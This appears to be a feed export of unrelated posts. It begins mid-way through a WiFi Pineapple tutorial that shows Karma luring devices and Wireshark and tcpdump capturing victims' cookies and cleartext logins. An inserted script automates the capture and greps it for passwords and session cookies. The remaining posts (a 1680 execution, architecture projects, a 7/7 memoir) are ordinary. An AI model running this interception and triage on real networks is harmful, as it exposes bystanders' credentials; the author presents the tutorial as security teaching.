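# DESTRUCTIVE. ext4 goes first so it becomes /dev/sda1 on the Pineapple, the
# device the OpenWrt USB-storage guide's fstab example mounts (check yours).
make_pineapple_usb() {
  dev=${1:?device required, e.g. /dev/sdb}
  size_mb=$(( $(blockdev --getsize64 "$dev") / 1048576 ))
  [ "$size_mb" -gt 512 ] || { echo "$dev is only ${size_mb}MB, too small" >&2; return 1; }
  data_mb=$(( size_mb - 256 - 4 ))          # 256 MB swap, a little slack for alignment
  wipefs --all "$dev"
  printf 'label: dos\n,%dM,L\n,,S\n' "$data_mb" | sfdisk "$dev"
  partprobe "$dev" 2>/dev/null || true
  mkfs.ext4 -L pineapple "${dev}1"
  mkswap -L pineapple-swap "${dev}2"
  layout_ok "$(blkid "${dev}"?)" || { echo "unexpected layout on $dev:" >&2; blkid "${dev}"?; return 1; }
  echo "$dev ready: ${dev}1 ext4 (${data_mb}MB), ${dev}2 swap"
}

case "${1:-}" in
  "")    : ;;                               # bare run or sourced: only define the functions
  check) layout_ok "$(blkid "${2:?device required}"?)" && echo "layout ok" ;;
  make)  make_pineapple_usb "$2" ;;
  *)     echo "usage: $0 make /dev/sdX | check /dev/sdX" >&2 ;;
esac
```

`sudo sh usb.sh check /dev/sdb` is also useful on its own against a stick you prepared some other way: if it reports anything other than one ext4 and one swap, that is the same situation the Pineapple silently refused to work with.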

Once it’s all set up you should see the storage appear under the “USB” menu item like so:

USB drive listed

You’ll also probably want to read from the drive back on your Windows machine at some point (I’ll save some packet captures to it a little later on) and I found DiskInternals Linux Reader did the job just fine.

Testing connectivity

Now that we’ve got everything ready to roll, let’s jump into the fun stuff! Back in that first screen grab of the UI, only the “Wireless” and “Cron Jobs” services were running so let’s fire up “Mk4 Karma” and set it to run automatically via the “Autostart” feature so the device just needs to be powered up for everything to kick into action:

Enabling services

Now we should be able to jump over to a device such as my iPhone and see some new SSIDs:

iPhone seeing the "trust me" SSID

This is a whole lot more interesting once you understand what’s under the grey box (which again, I’ve deliberately obfuscated), so let me explain what’s happening: each unsecured network is the Pineapple, via Karma, answering a probe request from the iPhone for a network it was previously associated with, so the phone believes that network is in range. The names include that of an old wireless router I replaced some years back, my parents’ network I was connected to interstate just the other day and an airline lounge in a far-flung corner of the world. All of the secured networks are legitimate (mine, my neighbour’s, etc.)

We’re also seeing the new SSID of the Pineapple that I set earlier (“trust me”) and I’ve gone ahead and explicitly connected to that for demonstration purposes. This now makes the homepage of the GUI much more interesting:

List of probe requests from and MAC addresses from different devices

What’s particularly interesting is what you can’t see which are all the SSIDs being probed for. These are predominantly APs I’ve connected to in the past and the MAC addresses doing the probing are predominantly my own (the Wi-Fi strength on the Pineapple is not great so I’m seeing mostly nearby devices), but you do see a few unfamiliar ones pop up which are clearly other people’s devices. It does make you wonder what risks might be present from devices leaking SSID names they’ve previously associated to; “Why is my colleague’s Android trying to connect to ‘Mistress Angeliques BDSM Palace’?!”

Anyway, right at the end of the above image you can see the association of my iPhone to the Pineapple which means we can now drill down and get a detailed report of what’s going on:

Details of iPhone connected to the Pineapple

This is mostly self-explanatory; the signal strength is kind of interesting as it starts to give you a sense of how far the victim might be from the device. Of course what will be really interesting is the byte counts: about one and a half MB has already passed between the phone and the Pineapple and, under normal operating conditions, the user would have absolutely no idea there was a MITM. Let’s move on to taking a sneaky look at those packets, because that’s where things get really interesting!

Packet capturing

Now that we’ve got all the nuts and bolts in place, let’s start capturing the data. There are a couple of different ways of doing this and probably the simplest is to monitor the traffic moving through the Ethernet adapter on the attacker’s PC. Once we start getting into the realm of traffic monitoring we need to start looking at packets and the best way to do this on a PC by a long shot is to use Wireshark.

One of the best things about Wireshark is that it’s free. This is no lightweight tool either; Wireshark is very full featured and is arguably the de facto standard for monitoring, capturing and analysing packets flying around a network. As powerful as Wireshark is, it’s also relatively easy to get started: just fire it up, choose the network interface you want to capture, which in this case is the Ethernet adaptor (remember, this is the NIC the Pineapple is connected to, so everything it forwards for its victims passes through here), then jump down to the “Capture Options” button:

Starting Wireshark to monitor traffic from the Pineapple

The capture options start to give you an idea of the extent of the configurability but we’ll just leave all that as default and start the capture:

Wireshark capture options

Once started, you should immediately begin to see packets flowing through the NIC:

Wireshark packets captured from the Pineapple

Right about here the penny should drop – this is someone else’s traffic! Ok, it’s really my own traffic from my iPhone but of course as we now know, the Pineapple has the ability to easily trick a victim into connecting to it whether deliberately or by default as their device looks for familiar SSIDs. Long story short is that this could just as easily be someone else’s traffic.

I’m not going to delve into exactly what we can do with that traffic right now because I have subsequent posts planned that will demonstrate it; for now, let’s just filter the traffic down to something a bit more familiar: HTTP. You see, the traffic above includes a whole bunch of different protocols which, for the purposes of talking about secure website design, aren’t going to be of much use. Let’s add a display filter of “http” and load up a website popular with developers:

HTTP requests to Stack Overflow being captured

As I’ve written before, Stack Overflow (at the time of writing) serves everything outside the logon over HTTP, so it’s easy to monitor that traffic (including the authentication cookie). Once the traffic is captured, you can either save it as a PCAP file for later analysis or right-click and follow the TCP stream, which gets you the entire request and response (including the headers with those valuable auth cookies):

Following the TCP stream of the request and response

I’ll stop there because that’s enough to demonstrate that everything is working as expected. Just to illustrate the power of the Pineapple, as I was writing this piece and watching the Wireshark traffic, a whole bunch of packets started appearing that weren’t mine:

My wife's MacBook Air connecting to the Pineapple

Turns out that my wife had wandered into range with her MacBook Air and it had automatically associated to the SSID “Apple Demo” which I can only assume is the access point the Apple store connected her to when walking her through the shiny new machine she recently bought. So there you go – right out of the box a brand new machine is already falling victim to the Pineapple without even trying.

Infusions and unattended packet capturing with tcpdump

This is the last configuration I want to touch on, simply because it covers a couple of important points: Infusions, and using the USB drive we set up earlier. With these concepts understood I actually feel reasonably well equipped to use the thing, so they’re worth capturing here.

The physical capabilities of the Pineapple should be pretty clear by now but what might not be quite as clear to the uninitiated is what can now be achieved with clever software. I’ll write a lot more about these capabilities in the future but for now I want to just take a quick look at the concept of Infusions.

Think of Infusions as apps and the Pineapple Bar as an app store for the Pineapple only with a couple of dozen apps that are all free. The Infusions cover a variety of different domains from informational to potentially malicious so there’s a good range of use cases in there. It’s accessible via the Pineapple from the “Pineapple Bar” link in the nav and it gives you some options like so:

List of Infusions

As you can see, I’ve already installed the “status” Infusion and by way of example, here’s the sort of info you get from it:

The status Infusion

This can be pretty handy info in GUI format, there are also some neat real time graphs for things like CPU utilisation and bandwidth:

image

The really interesting one, however, is tcpdump. Now tcpdump is not an Infusion in and of itself; it’s an existing project which has been turned into an Infusion so that it’s easily installable on the Pineapple and can then be managed from the GUI. What tcpdump offers is the ability to do effectively what we just did with Wireshark in terms of packet capturing, but to do so locally within the device itself. What this means is that you can have the Pineapple independently capture traffic without needing to run Wireshark on a PC. In fact, if you establish a connection from the Pineapple directly to the web (and there are several ways to do this), you don’t need a PC at all. Imagine just that little cigarette-pack-sized Pineapple sitting there on its own with its own power source and internet connection, and any victims within Wi-Fi shot of it automatically connecting and having their packets captured. That’s powerful stuff.

Now that we have a correctly partitioned USB drive, Infusions can be installed directly to there:

image

Incidentally, it’s that highlighted “USB Storage” link that I never saw when creating the ext4 partition in Windows.

The thing with packet captures is that there can be a lot of them and they can chew up space really quickly depending on how liberal you are with the data you want to save. You can configure tcpdump to filter out a lot of the “noise” packets and restrict it to, say, only HTTP traffic or even just only to HTTP requests using the POST verb. For now though we’ll just run it up with the defaults to capture all the traffic running through the wired LAN port:

Capturing TCP traffic using tcpdump

You can now sit back and let the traffic flow whilst the Pineapple captures everything anyone connected to it sends across the wire (or air, as the case may be). With the iPhone connected, I browsed over to a site I know doesn’t properly protect user credentials and attempted to log on. Once done you can hit “Stop” and you’ll see a summary of the captured data:

Captured packets from tcpdump

Now we can jump over to the “History” tab and download the PCAP file:

Viewing the tcpdump history

That PCAP file is just the same as what we captured in Wireshark earlier on, and you can now load it back up into Wireshark and analyse it in just the same way as the packets it captured directly. Alternatively, you can pull the USB drive out, chuck it into the PC and read it with a tool like DiskInternals, which I mentioned earlier. Here’s what we can now see from my brief visit to the site:

Login credentials sent in unprotected GET request

This site is particularly bad because the credentials go into the query string of a GET request, which also means they can end up in browser history, server logs and Referer headers, but of course the real story in the context of the Pineapple is that the whole thing is sent in the clear, so it’s now easy to see everything sent by the victim and returned by the server. Keep in mind that this was all captured directly on the Pineapple (or at least on the USB drive), so the whole thing is now pretty well self-contained. That’s a good place to end the traffic capture for today; there’ll be much more in the future though…
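The following is an added example, mine rather than the Hak5 Infusion’s code or anything from the original post, that does from the shell what the two capture walkthroughs above did by hand: the Wireshark “http” filter and follow-TCP-stream step that exposed the Stack Overflow auth cookie, and the tcpdump run to the USB drive that caught credentials in a GET. It runs tcpdump unattended on the Pineapple with a BPF filter (all traffic, HTTP only, or HTTP POSTs only) and a size-bounded ring of capture files so a long run cannot fill the stick, then triages a saved capture for cleartext credentials and cookies. It assumes the stick is mounted at /usb and that victim traffic crosses the br-lan bridge; both are assumptions, so check `mount` and `ifconfig` on your device.

```shell
#!/bin/sh
# Added example, not from the original post or the tcpdump Infusion: capture
# unattended on the Pineapple, writing size-rotated files to the USB stick
# and keeping only HTTP (or only HTTP POST) traffic, then triage a saved
# capture for the cleartext credentials and session cookies that were picked
# out by hand in Wireshark above.
#
# Assumptions (not from the post): the stick is mounted at /usb and victim
# traffic crosses br-lan; files are capped at 10 MB each in a ring of 20.

# BPF filter for $1: "all" (none), "http" (TCP port 80 both ways) or "post"
# (TCP segments to port 80 whose payload begins with "POST"). The "post" form
# finds the payload through the TCP data-offset nibble in tcp[12], so it is
# correct whatever TCP options are present. 0x504f5354 is ASCII "POST".
bpf_filter() {
  case "$1" in
    all)  printf '' ;;
    http) printf 'tcp port 80' ;;
    post) printf 'tcp dst port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354' ;;
    *)    echo "unknown filter: $1 (use all|http|post)" >&2; return 1 ;;
  esac
}

# Start capturing; runs until killed. -s 0 keeps whole packets, -C/-W make a
# size-based ring buffer so old files are overwritten instead of the overlay
# (or the stick) filling up.
capture() {
  mode=${1:-http}; iface=${2:-br-lan}; dir=${3:-/usb/captures}
  grep -q ' /usb ' /proc/mounts || { echo "/usb is not mounted; refusing to write to the overlay" >&2; return 1; }
  filt=$(bpf_filter "$mode") || return 1
  mkdir -p "$dir"
  # $filt is deliberately unquoted: tcpdump joins its trailing arguments into
  # one expression and an empty filter must vanish. set -f stops the shell
  # treating the [ ] in the expression as a glob.
  set -f
  tcpdump -i "$iface" -n -s 0 -C 10 -W 20 -w "$dir/$mode.pcap" $filt
}

# From tcpdump's ASCII (-A) rendering on stdin, keep the lines that carry
# credentials or session state in the clear: request lines whose query string
# names a password/user/token parameter, and Cookie/Authorization headers.
# The request line is not anchored because -A prints the IP/TCP header bytes
# as dots on the same line; headers follow on lines of their own.
triage_lines() {
  grep -E -i '(GET|POST) /[^ ]*(pass|pwd|login|user|token)[^ ]*=[^ ]* HTTP/1\.[01]|^(Cookie|Set-Cookie|Authorization): '
}

# Read a saved capture (on the Pineapple, or any PC with tcpdump) and triage it.
triage() {
  tcpdump -n -r "$1" -A 2>/dev/null | triage_lines
}

case "${1:-}" in
  "")      : ;;                          # bare run or sourced: only define the functions
  capture) capture "$2" "$3" "$4" ;;
  triage)  triage "$2" ;;
  *)       echo "usage: $0 capture [all|http|post] [iface] [dir] | triage FILE.pcap" >&2 ;;
esac
```

`sh cap.sh capture post &` on the Pineapple gives you the unattended, self-contained capture described above, and `sh cap.sh triage /usb/captures/post.pcap00` shows in two lines what took a right-click and a scroll in Wireshark. The “post” filter is worth knowing on its own: it is the classic trick for matching on payload content with a plain BPF expression, and it works equally well in Wireshark’s capture filter field.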

Other miscellaneous info

For those of you thinking of getting yourself into a Pineapple (and I know there are a few based on Twitter chats alone), there are a couple of pre-purchase things worth pointing out. Firstly, I went el-cheapo and only got the device itself without any accessories. This means you get an AC adaptor for power and that’s it so it’s definitely not mobile.

Being able to take the Pineapple out in the wild definitely presents all sorts of opportunities not available while it’s plugged in to the mains so the USB battery pack is a must. As the name suggests, this also gives you the ability to power the device directly from USB so you can just plug it into your laptop if the juice in the battery runs out.

The other thing is that the Wi-Fi strength is pretty ordinary. By way of example, here’s how inSSIDer sees the Pineapple (in yellow, of course) versus my usual access point in blue from only about a foot away:

image

However, move into the next room and the Pineapple just about drops off altogether:

image

There are a few different antenna options so if your intended use doesn’t involve connecting to a target within a very, very close distance then this would be worth a look. Other than that though, the only other thing that might be useful is a handy case and given HakShop has a Pineapple with battery and a case going for $115 at the time of writing, that’s probably your best bet.

The other thing that some people might find interesting is that a bunch of the code running on the Pineapple is up on GitHub. This is apparently the www folder of the device so it’s not the firmware itself, but it is a bunch of the PHP files and scripts which is kind of interesting to have a browse through.

Responsible use

I bought the Pineapple for the sole purpose of helping developers better understand the risks of insufficient transport layer security. You’re going to see me writing a lot more about the risks of loading logon forms over HTTP, embedding HTTPS login forms in HTTP pages, mixed mode HTTP / HTTPS and other similar risks. The Pineapple will help me move that discussion from a theoretical “An attacker might do this or could do that” to a very practical “Here, let me show you exactly why that pattern is risky”. Demonstrations of this kind are very powerful and they’re often the only way of getting the message through.

However, there is very clearly scope for misuse and abuse of unsuspecting victims. That incident I mentioned earlier where my wife walked into the room and suddenly I was watching her network traffic is a perfect example of how easy it is to do potentially evil things, sometimes without even trying. For those reading this and considering how they might use it, there are some great use cases for penetration testing or demoing (in)secure web app design but there is also some very, very thin ice out there. Caveat emptor.

What next for the Pineapple?

The great thing about the Pineapple is that it makes it dead easy to demonstrate a whole bunch of concepts that I often write about but haven’t always shown in execution. For example, why it’s not ok to load login forms over HTTP even if they post to HTTPS. Another one that has come up a few times (including in the Top CashBack post) is not embedding a login form that is loaded over HTTPS within an iframe in an HTTP page. There’s a whole heap of things that will be easily demonstrated within a controlled environment.

Then there’s the uncontrolled environment – the public. There’s a lot of grey area there about what can be done for the purposes of research and education without crossing the line into outright eavesdropping and getting on the wrong side of people. I do have some thoughts on it, but I’ll hold onto those for the moment…

Regardless, I’ll start producing some video material to demonstrate the ease with which this thing does its work because it’s immensely impressive to see in real time – at least I was impressed! I’ve already created a bit of video for a training program I’m putting together (more on that another day), and I reckon it comes up great. Stay tuned, there’s much, much more to come.

Useful Links

  1. Markiv: What We Know And What We Don't Know – good general overview of features and configuration
  2. Mark 4 setup script – very handy for seeing how to configure various things via the shell.
  3. You just can't trust wireless: covertly hijacking wifi and stealing passwords using sslstrip – good view of defeating SSL with the device
  4. Main Wi-Fi Pineapple site - all things Pineapple start from here
17 Apr 08:52

1680: John Marketman, jealous chirurgeon

by Headsman

On this date in 1680, an unusual public execution took place in West Ham.

John Marketman (Manchetman) was a ship’s surgeon, which he spelled “chirurgeon” because it was olden days. Being away at sea gave him a lot of time to picture how his wife Mary Snerlin back home might be cuckolding him, and when he arrived back one time to apparent corroborating information, he went a little nutso.

According to the trial record from the spring 1680 Chelmsford Assizes,

the circumstances of the bloody Deed was sworn to as followeth, the Prisoner being newly come on Shore, having been at Sea for a considerable time, was informed that she had been over lavish of her Favours to a Neighbour of hers, being by profession a Shoemaker; he being newly come from Sea and coming home as it is said surprized her too familiar with the said Shoemaker, whereupon he in a Rage threatned [sic] her, yet notwithstanding the Rage of Jealousie, he seemed reconciled, but to the contrary retaining an inward hatred, which she perceiving, fled to a neighbours house, thinking to stay whilst his Anger was overpast, yet he with a seem’d Reconciliation, came to invite her home, and came up to her as if he would imbrace her, but with his bloody hands he stab’d her with a Knife under her Right Breast, about four inches deep,* of which Wound she in a little time died, only confessing her innocence, at his Trial he did not deny the Fact, and after his being convicted did confess his Rashness in proceeding on such Cruelty, without the least remorse, after he was found Guilty of wilful Murder and received Sentence of Death, he seemed exceeding Penitent, and did bewail his cruel Crime, shedding many Tears, that he had given himself over to the suggestions of the Prince of darkness, and so continued to the utmost.

There are somewhat different twists on the underlying facts of the case from different sources — like the profession of the alleged lover, and the question of whether Marketman caught them in flagrante delicto or merely heard town gossip, and the matter of whether he took revenge with cold calculation or in more of a drunken fury. Fill it out however you like; in outline we have one of the stock classics of homicide.

But at receiving his sentence, Marketman did something remarkable: he asked the judge to alter the sentence so that he would be hanged not at the usual execution spot in Chelmsford, but in West Ham — “the town where he did perpetrate the wicked act.”

Marketman, you could say, really went all-out from that very first moment to put on a full-dress, no-holds-barred scaffold performance par excellence. He should have been in the business of scripting deaths.

Besides hanging in West Ham, Marketman had his mother (“poor Soul drowned in Sorrow,” in the words of a pamphlet titled “True Narrative of the Execution of John Marketman”**) lead him personally to the gallows. There a minister preached on 2 Corinthians 7:9, “I rejoice, not because you were grieved, but because you were grieved into repenting” — demonstratively comforting Marketman that his imminent strangulation would stand “a monument to divine justice … in and thorow you, God sheweth the consequences of a sinful and wicked life.”

This was the evolving principle of executions as exemplary deterrence, and Marketman was ready to play the part in his final turn. He spoke for a long time, with the swooning mother right there as evidence, on how he

had been very disobedient to his too indulgent parents, and that he had spent his youthful days in profanation of the Sabbath and licentious evils of debaucheries beyond expression, and that he had been over penurious in his narrow observance of his wive’s ways, desirous that all should pray to the Eternal God for his everlasting welfare, and with many pious expressions ended this mortal life.

In focusing on the theatrical aspects of Marketman’s execution, we don’t mean to suggest that the sea-chirurgeon’s encounter with his death was in any way insincere: present-day executions too comprise a ritualized performance in which a good many dying prisoners are very willing to participate. (Modern American executions behind prison walls don’t map to the take-warning-from-my-fate discourse, but it’s quite common for those on the gurney to offer victims’ witnesses the “closure” shibboleth.)

The early-modern condemned were widely expected to give a pedagogical account of themselves before execution, and widely complied with the expectation. Marketman simply underscores the surprising extent to which a fellow will not only comply but actively assert his part in his own death. Marketman wanted his hanging to embody redemption, instruction, and the majesty of the law that hanged him. Maybe in his heart of hearts he even wanted that before he knifed poor Mary Snerlin.

The chirurgeon went so far as to write a prison letter to his supposed rival: “As for the injury you have done me, I freely from my heart forgive you, begging God to give you grace that you may unfeignedly repent of all your sins, that God may have mercy on your soul.”

See J.A. Sharpe, “Last Dying Speeches: Religion, Ideology and Public Execution in Seventeenth-Century England,” Past & Present, May 1985.

* Say what you will about chirurgeons, they know about killing.

** This source also says his wife was pregnant, which must have added some vinegar to Marketman’s cuckoldry suspicions.

16 Apr 03:00

Nirvana Film Offices / SJK Architects

by José Tomás Franco

© Pallon Daruwalla & Shimul Javeri Kadri

Architects: SJK Architects
Location: Bangalore, India
Design Team: Shimul Javeri Kadri, Sarika Shetty, Roshni Kshirsagar, Poonam Sachdev
Area: 8000 m2
Year: 2011
Photographs: Pallon Daruwalla & Shimul Javeri Kadri

Nirvana is an office space for a film production company. Its films are a surprise, offering an unexplored human perspective. Its workspace is built on the idea that ideas come from connecting synapses, not from privacy or isolation.


The Nirvana “box” emerged, as all urban buildings do, from a small corner plot in the heart of the busy Indiranagar neighbourhood of Bangalore. The building was constructed on a budget of 2.25 million rupees (including all services and interiors).


This project explores the possibilities inherent in a commercial building despite the constraints of real estate. The resulting urban typology breaks all the rules, using almost no electricity for light or ventilation. The core of this box is the central staircase, which cuts through the building beneath a large skylight, bathing the interior in natural light and ventilation.


The divisions between work and rest areas are blurred by the presence of the stair core. The facade further encourages connections to the outside through glass and acrylic louvres. The louvres, opaque and solid, open in unison to let in the breeze, light, wind and rain. The notions of wall and window are swapped, producing a dynamic facade: the window is solid, the wall transparent and open. These louvres, built from solid acrylic sheets, were custom-made and are used as an exterior element for the first time in India.


The stair core is a flexible, permeable device that lets in light and ventilation yet blocks the rain and provides privacy. This element of wood and transparent acrylic is in fact a set of interlocking louvres that can move in unison, once again to ventilate the space. The solid black bathrooms, the only space that demands complete privacy, were designed to contrast completely with the brightness of the rest of the building.

Floor plan

The lightness of the structure and its materials, wood, concrete and glass, produces a building in which light and shade, thought and interaction become the protagonists. A contemporary building that ignores any “ism” and is synonymous with innovation, sustainability and pluralism (every stylistic trait coexists: classic chairs, kitsch graphics, antique windows). The project’s success is evident in the production team’s comments: “we work longer hours and with great enthusiasm. We love the light and it is everywhere.”

Section

[Gallery: photographs © Pallon Daruwalla & Shimul Javeri Kadri; floor plan; site plan; section]

Nirvana Film Offices / SJK Architects was originally published on Plataforma Arquitectura on 16 Apr 2013.


16 Apr 07:00

Cabane 217 / Bourgeois Lechasseur Architectes

by Fernanda Castro

© Stéphane Groleau

Architects: Bourgeois Lechasseur Architectes
Location: Ste-Catherine-de-la-Jacques-Cartier, Quebec, Canada
Contractor: Constructions Richard Cliche
Year: 2012
Photographs: Stéphane Groleau


Cabane 217 is a project to completely redesign a house in Ste-Catherine-de-la-Jacques-Cartier. The house sits on a wooded lot bordering the river. The owner wanted to give his home new life by opening it up to its surroundings. The changes also involved completely rethinking the living areas in order to create a dialogue between exterior and interior. The basic premise was to retain some of the original character of the building while creating a contemporary project in harmony with its setting. The design followed a preliminary LEGO™ model created by the owner.


The steep pitch of the roof is retained, but the traditional skylights have been transformed. A dormer opens onto the street to shyly reveal the staircase and bring light into the central space of the house. On the side nearest the river, part of the roof has been raised to accommodate the master bedroom and a private bathroom. The second, larger dormer creates an airy, luminous space. The client can thus keep the idea of a “tree house” while still preserving privacy with the surrounding vegetation.


The projection room that protrudes from the main part of the building is an addition to the original house. This room has a fireplace that makes it an intimate, welcoming space. It contrasts with the spacious rooms and the large deck that bring the client into a new relationship with the surroundings. A threshold between interior and exterior frames the views of the site.


The interior is now much brighter, with nature all around it. The kitchen has been completely renovated. The wood panelling and slate floor respect the warm, natural feel of the place. A new, lighter and brighter staircase leads to the upper floor. The bathroom, with its spectacular shower, opens onto the master bedroom. The floor-to-ceiling windows in the bedroom give the impression of floating among the trees.


The materials used on the exterior blend well into the natural and built environment of the region. The original wood cladding was kept and repainted. The windows are wooden like the originals and seem to flow into the plywood panels that extend outward to define new elements. The metal roof reflects the sun and recalls the traditional design of this country house.

Section

[Gallery: photographs © Stéphane Groleau; original house; site plan; section; elevations]

Cabane 217 / Bourgeois Lechasseur Architectes was originally published on Plataforma Arquitectura on 16 Apr 2013.


17 Apr 02:20

The bomb that changed my life (2011)

On July 7th, 2005, near Edgware Road in London, shortly before 9am, I sat on a train, listening to my music on an iAudio M3L (I was very late to the iPod party), on my way to my Accenture job. It was summer, but the weather was not particularly sunny. Typical London grey. I don't remember what I was thinking about, but it was probably something trivial.

Suddenly, there was, first, a flash. The light came before the sound. My vision went black, and simultaneously a bright light started at the centre of my vision and expanded outwards. It looked like those cartoon drawings of explosions, but bright and, soon, loud. Not a weighty, ponderous sound, more like the bass-less sound of a firearm (in real life, not in the movies). Like a very loud TACK.

Thick black smoke poured through the open windows at either end of the tube carriage I was in and quickly filled it. I sat frozen, incapable of moving, not even to pull the headphones out of my ears. Only one thought looped through my head, over and over and over again, endlessly:

This was a bomb. This was obviously a bomb. There could be another bomb. If the other bomb was in this carriage, I would be dead before I knew it.

Before that day, I never understood the expression "paralysed by fear". It was something I'd read and dismissed as an image. On July 7th, 2005, I experienced it directly. For what felt like an eternity (but I think was about 2 minutes) the only thing my brain could do was repeat that same stream of thought over and over again endlessly. There seemed to be nothing else to do or think in the universe. I was maybe about to die and that was all that mattered. I didn't even look around the carriage to see how other people were reacting. I was in my own little world, frozen, paralysed.

How did I get out of it? Somehow, I noticed some movement to my side. People were trying to pry open the doors of the train, to let some of the smoke out, to let some air in. I felt an impulse to help. A new thought appeared: I am a mentally balanced, healthy young man. I should be one of those people who can help others in this situation, not just a passive, helpless observer. I can help: I have a backpack which I can stick into the doors to keep them partly open.

The paralysis drained away. I stood up, went to the door, and as the others held them open, shoved my backpack in the opening. They released their grip and the doors stayed partially open, letting the ugly smoke out and the marginally better air from the tube tunnels in.

Now that I was standing, I pulled my headphones out. But the music continued playing in my head. It was a hypnotic, great track by James Holden. You can listen to it here, while you read the rest of this article. For the forty-five minutes that we were all stuck in this carriage with our fears, the music never stopped. I like to think that some part of my brain knew that I needed the soothing that the music provided.

I remember some parts from those 45 minutes. Mostly, I remember having to rise above the fear of there being another bomb. I remember looking around and seeing that this fear was in every face, in every word that every person said, and at the same time, it was anathema, unspeakable, and for forty-five minutes not a single one of the 40 people in that carriage put that fear into words.

I remember a young woman who stood next to me and tried to make conversation, probably to reassure herself that all was normal. I remember that I could not give her that reassurance. I was fighting my own demon, and I had no energy to spare on small talk, which takes effort from me even in normal social situations. I could tell she needed it, but I could not give it. Eventually she found someone else to try to talk to.

I don't remember what was discussed by people in the train, but I remember there was a concerted, deliberate effort to not think of what this obviously was. Everyone knew it was obviously a bomb. But the awful consequence that rode on that thought, the possibility of there being another bomb right here, right now, was unthinkable, and so the obvious truth was banished. I even convinced myself, for a while, that it could be something else.

It was hard work, this self-delusion, when the minutes were punctuated by the nearby screams of the wounded and dying. Six people died there at Edgware Road, metres away. Fifty-six, including the four bombers, across the tube network. Several dozen more lived with serious injuries, their lives probably changed forever. But for forty-five minutes, forty uninjured commuters managed the feat of convincing themselves that this was anything but a bomb. I think the favourite theory was an electrical explosion, until the driver walked through the carriage.

He came to perform the impossible task of reassuring us and to let us know what was next. The reassurance was honest, if not very effective. Asked if it could be an electrical explosion, he answered, "I don't know what this was, and I don't want to make up any theories, but I know in 18 years of working here I've never seen anything like this." He stopped short of declaring the obvious.

However, by then, the self-delusion was in full effect. To give you an idea of how much we all needed to believe that this was not what it plainly was, one old lady, wrapped up in the reality distortion field, asked the driver if it would be possible to ask people in the neighbouring carriages to stop screaming, as it was very unnerving.

"Madam, some of these people are dying," was the driver's response, ending that conversation.

It's easy to think that woman was insensitive. She merely expressed, in an absurd way, the belief to which we were all clinging. She probably regrets asking that awful question, to this day. But she shouldn't. She was a symptom of a group behaviour, not a cause of it.

Eventually, we were allowed out of the train. Our train was not actually damaged (other than the front); the bomb had been on the oncoming train. As the driver later put it in this BBC interview, we were incredibly lucky. Had the bomb exploded ten seconds later, it would have taken out one of our carriages too - maybe the one I was sitting in. I owe my life to a terrorist's inept planning.

Our train had stopped going forward in part because the roof of the other train was on our tracks, ripped out by the blast. Both had continued moving forwards, coming to rest alongside each other. So at one point, still inside our train, we had to pass, to our right, the carriage where the blast had happened. The driver advised us not to look to the right.

In most other situations, I might have disobeyed. I am naturally curious. I need to observe. I want to. This time, I did what I was told. Somewhere inside, I knew that I would have enough emotional baggage to deal with without throwing in pictures of dying people and mutilated, burnt bodies. We got out of the carriage, walked along the tracks, and came out of the station. There was no one waiting to shuffle us towards ambulances, care workers, or anything, and that's ok - we weren't injured at all, at least physically. They should probably have taken names, to offer psychological counselling later, but they had other things to worry about.

The only signs of the death happening below were two people, wrapped in the thick bandages which are used on gravely burnt people. They were covered from head to toe. Did they live or not? I don't know. They were sitting alone, abandoned, motionless, leaning against a wall. Chaos reigned outside, police, ambulances, people, crowds, cars, buses, all jumbled up.

I managed to call my parents just before the phone network broke down. "There's been some kind of bombing in London. I'm ok. I'm getting away from the crowds."

And I did. As my mind started working again (or so I thought), my one thought, resuming from below-ground, was to stay away from crowds. There might be another bomb. I walked west, and ended up near some office buildings. There were bench-like wooden structures there. I sat down on one and I cried for ten whole minutes.

I needed to let the emotions out. I was too full, bursting.

Eventually, I ran out of tears. Insanely enough, I decided to make my way to work, on the other side of town, while avoiding public transport. I walked all the way to the centre of Hyde Park. There, I sat on a bench and cried some more. Someone walked past me and, excited and scared, said "there's been a bombing!" "Yeah, I know..." I said weakly as he walked away.

I continued my wandering, aiming roughly in the right direction. I felt clear-headed, but in hindsight my brain was clearly not quite right yet. I was sleep-walking, moving in automatic mode. The obvious thing to do was to go home, but the default was to go to work. I was finally jolted awake when a huge truck stopped next to me. I flinched away - imagine if there was a bomb in that! - and then noticed some soldiers with big machine guns pulling up concrete fence-slabs into the road. I heard an elderly gentleman ask one of the soldiers what was going on, and the soldier replied that this was the US embassy.

The US embassy!

Somehow, wandering randomly through London in a general west-to-east direction, trying to avoid dangerous crowds, I had managed to find myself in probably the most risky place to be a few hours after the bombings. That woke me up. I made my way home.

On the way, I remember seeing a bus crammed with people. It stopped next to me, and I took some steps away from it. Insane, I thought. After what just happened? But for most people, this was just an annoying travel disruption, I guess.

I got home. A friend came to visit to make sure I was alright (thanks Andy!). I was. This was a Thursday, and Friday was declared a day off. I stayed off public transport for the weekend. On Monday, I had to get to work, but, although I felt no sense of panic, I decided to travel at 6am to make it less likely that I would connect tube travel with fear. The tube was mostly empty at that time. This would not be a popular hour for a bombing.

Over time, I got used to the tube again. Now, I feel no fear - almost. Every once in a while, very rarely (once or twice a year), I will spot someone who looks suspicious, with a bag that could contain a bomb, in my carriage. Sometimes, that is followed by a wave of fear. I can control it. It doesn't show on my face or in the tone of my voice. But at the next stop, I get off and wait for the next train. Just in case.

Throughout that summer, my second year in Accenture, I had been mildly discontented. I felt that my job was a little boring, but I kind of accepted that. It was a new project - my second project - so it wasn't so bad. And yet, it was during that summer that I started looking for a new job. There was something about the idea that I might have died in a grey train full of grey commuters, having not truly lived, that I could not stand.

Over the next year, I looked for jobs in banks and other consultancies, but they all seemed even worse than the job I had. I started writing fiction again. I read self-improvement books like "Seven Habits" and prepared a "mission statement" for myself, to figure out what it was that I wanted. Eventually, in my third year there, I started to think of starting my own business. Yes, that seemed more interesting.

Then, one of my best friends got in touch with me with this idea to build this business that would make money. The rest of the story can be found scattered around the internet, on this blog and others. Today, in December 2011, six and a half years later, if I were to die in a train carriage tomorrow - well, I would still feel unfulfilled (there's a lot I still want to achieve, of course) but a hell of a lot less so than if the bomb had exploded 10 or 20 seconds later, that morning on July 7th, 2005.

Did this event change my life?

17 Apr 02:20

1Password GPU brute-force with 3M hash/s

In the last weeks I spent a lot of time adding TrueCrypt to oclHashcat-plus since there have been lots of requests for it and I can see how the forensic world will benefit from it.

